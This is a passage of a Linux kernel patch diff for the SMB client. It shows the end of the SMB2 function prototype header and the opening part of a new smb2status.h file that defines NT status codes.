++			u64 persistent_fid, u64 volatile_fid,
++			struct cifs_ntsd *pnntsd, int pacllen, int aclflag);
++extern int SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
++		       u64 persistent_fid, u64 volatile_fid,
++		       struct smb2_file_full_ea_info *buf, int len);
++extern int SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++				u64 persistent_fid, u64 volatile_fid);
++extern int SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
++			     const u64 persistent_fid, const u64 volatile_fid,
++			     const __u8 oplock_level);
++extern int smb2_handle_cancelled_close(struct cifs_tcon *tcon,
++				       __u64 persistent_fid,
++				       __u64 volatile_fid);
++extern int smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server);
++void smb2_cancelled_close_fid(struct work_struct *work);
++extern int SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 u64 persistent_file_id, u64 volatile_file_id,
++			 struct kstatfs *FSData);
++extern int SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 u64 persistent_file_id, u64 volatile_file_id,
++			 struct kstatfs *FSData);
++extern int SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
++			 u64 persistent_file_id, u64 volatile_file_id, int lvl);
++extern int SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
++		     const __u64 persist_fid, const __u64 volatile_fid,
++		     const __u32 pid, const __u64 length, const __u64 offset,
++		     const __u32 lockFlags, const bool wait);
++extern int smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++		      const __u64 persist_fid, const __u64 volatile_fid,
++		      const __u32 pid, const __u32 num_lock,
++		      struct smb2_lock_element *buf);
++extern int SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
++			    __u8 *lease_key, const __le32 lease_state);
++extern int smb3_validate_negotiate(const unsigned int, struct cifs_tcon *);
++
++extern enum securityEnum smb2_select_sectype(struct TCP_Server_Info *,
++					enum securityEnum);
++extern void smb2_parse_contexts(struct TCP_Server_Info *server,
++				struct smb2_create_rsp *rsp,
++				unsigned int *epoch, char *lease_key,
++				__u8 *oplock, struct smb2_file_all_info *buf,
++				struct create_posix_rsp *posix);
++extern int smb3_encryption_required(const struct cifs_tcon *tcon);
++extern int smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
++			     struct kvec *iov, unsigned int min_buf_size);
++extern int smb2_validate_and_copy_iov(unsigned int offset,
++				      unsigned int buffer_length,
++				      struct kvec *iov,
++				      unsigned int minbufsize, char *data);
++extern void smb2_copy_fs_info_to_kstatfs(
++	 struct smb2_fs_full_size_info *pfs_inf,
++	 struct kstatfs *kst);
++extern int smb311_crypto_shash_allocate(struct TCP_Server_Info *server);
++extern int smb311_update_preauth_hash(struct cifs_ses *ses,
++				      struct TCP_Server_Info *server,
++				      struct kvec *iov, int nvec);
++extern int smb2_query_info_compound(const unsigned int xid,
++				    struct cifs_tcon *tcon,
++				    const char *path, u32 desired_access,
++				    u32 class, u32 type, u32 output_len,
++				    struct kvec *rsp, int *buftype,
++				    struct cifs_sb_info *cifs_sb);
++/* query path info from the server using SMB311 POSIX extensions*/
++int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++				 struct cifs_sb_info *cifs_sb, const char *full_path,
++				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
++int posix_info_parse(const void *beg, const void *end,
++		     struct smb2_posix_info_parsed *out);
++int posix_info_sid_size(const void *beg, const void *end);
++#endif			/* _SMB2PROTO_H */
+diff --git a/fs/smb/client/smb2status.h b/fs/smb/client/smb2status.h
+new file mode 100644
+index 0000000000000..a9e958166fc53
+--- /dev/null
++++ b/fs/smb/client/smb2status.h
+@@ -0,0 +1,1769 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   SMB2 Status code (network error) definitions
++ *   Definitions are from MS-ERREF
++ *
++ *   Copyright (c) International Business Machines  Corp., 2009,2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++/*
++ *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
++ *  SEV C N <-------Facility--------> <------Error Status Code------>
++ *
++ *  C is set if "customer defined" error, N bit is reserved and MBZ
++ */
++
++#define STATUS_SEVERITY_SUCCESS __constant_cpu_to_le32(0x0000)
++#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
++#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
++#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
++
++struct ntstatus {
++	/* Facility is the high 12 bits of the following field */
++	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
++	__le32 Code;
++};
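++/*
++ * A worked decode of one value, following the MS-ERREF layout above:
++ * STATUS_ACCESS_DENIED below (0xC0000022) has severity 0x3 (error) in
++ * the top two bits, C = 0 and N = 0 (both clear), facility 0x000 in
++ * the next twelve bits, and error status code 0x0022 in the low word.
++ */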
++
++#define STATUS_SUCCESS cpu_to_le32(0x00000000)
++#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
++#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
++#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
++#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
++#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
++#define STATUS_ABANDONED cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
++#define STATUS_USER_APC cpu_to_le32(0x000000C0)
++#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
++#define STATUS_ALERTED cpu_to_le32(0x00000101)
++#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
++#define STATUS_PENDING cpu_to_le32(0x00000103)
++#define STATUS_REPARSE cpu_to_le32(0x00000104)
++#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
++#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
++#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
++#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
++#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
++#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
++#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
++#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
++#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
++#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
++#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
++#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
++#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
++#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
++#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
++#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
++#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
++#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
++#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
++#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
++#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
++#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
++#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
++#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
++#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
++#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
++#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
++#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
++#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
++#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
++#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
++#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
++#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
++#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
++#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
++#define DBG_CONTINUE cpu_to_le32(0x00010002)
++#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
++#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
++#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
++#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
++#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
++#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
++#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
++#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
++#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
++#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
++#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
++#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
++#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
++#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
++#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
++#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
++#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
++#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
++#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
++#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
++#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
++#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
++#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
++#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
++#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
++#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
++#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
++#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
++#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
++#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
++#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
++#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
++#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
++#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
++#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
++#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
++#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
++#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
++#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
++#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
++#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
++#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
++#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
++#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
++#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
++#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
++#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
++#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
++#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
++#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
++#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
++#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
++#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
++#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
++#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
++#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
++#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
++#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
++#define DBG_CONTROL_C cpu_to_le32(0x40010005)
++#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
++#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
++#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
++#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
++#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
++#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
++#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
++#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
++#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
++#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
++#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
++#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
++#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
++#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
++#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
++#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
++#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
++#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
++#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED cpu_to_le32(0x401E0351)
++#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
++#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
++#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
++#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
++#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
++#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
++#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
++#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
++#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
++#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
++#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
++#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
++#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
++#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
++#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
++#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
++#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
++#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
++#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
++#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
++#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
++#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
++#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
++#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
++#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
++#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
++#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
++#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
++#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
++#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
++#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
++#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
++#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
++#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
++#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
++#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
++#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
++#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
++#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
++#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
++#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
++#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
++#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
++#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
++#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
++#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
++#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
++#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
++#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
++#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
++#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
++#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
++#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
++#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
++#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
++#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
++#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
++#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
++#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
++#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
++#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED cpu_to_le32(0x801B00EB)
++#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
++#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
++#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
++#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
++#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
++#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
++#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
++#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
++#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
++#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
++#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
++#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
++#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
++#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
++#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
++#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
++#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
++#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
++#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
++#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
++#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
++#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
++#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
++#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
++#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
++#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
++#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
++#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
++#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
++#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
++#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
++#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
++#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
++#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
++#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
++#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
++#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
++#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
++#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
++#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
++#define STATUS_UNWIND cpu_to_le32(0xC0000027)
++#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
++#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
++#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
++#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
++#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
++#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
++#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
++#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
++#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
++#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
++#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
++#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
++#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
++#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
++#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
++#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
++#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
++#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
++#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
++#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
++#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
++#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
++#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
++#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
++#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
++#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
++#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
++#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
++#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
++#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
++#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
++#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
++#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
++#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
++#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
++#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
++#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
++#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
++#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
++#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
++#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
++#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
++#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
++#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
++#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
++#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
++#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
++#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
++#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
++#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
++#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
++#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
++#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
++#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
++#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
++#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
++#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
++#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
++#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
++#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
++#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
++#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
++#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
++#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
++#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
++#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
++#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
++#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
++#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
++#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
++#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
++#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
++#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
++#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
++#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
++#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
++#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
++#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
++#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
++#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
++#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
++#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
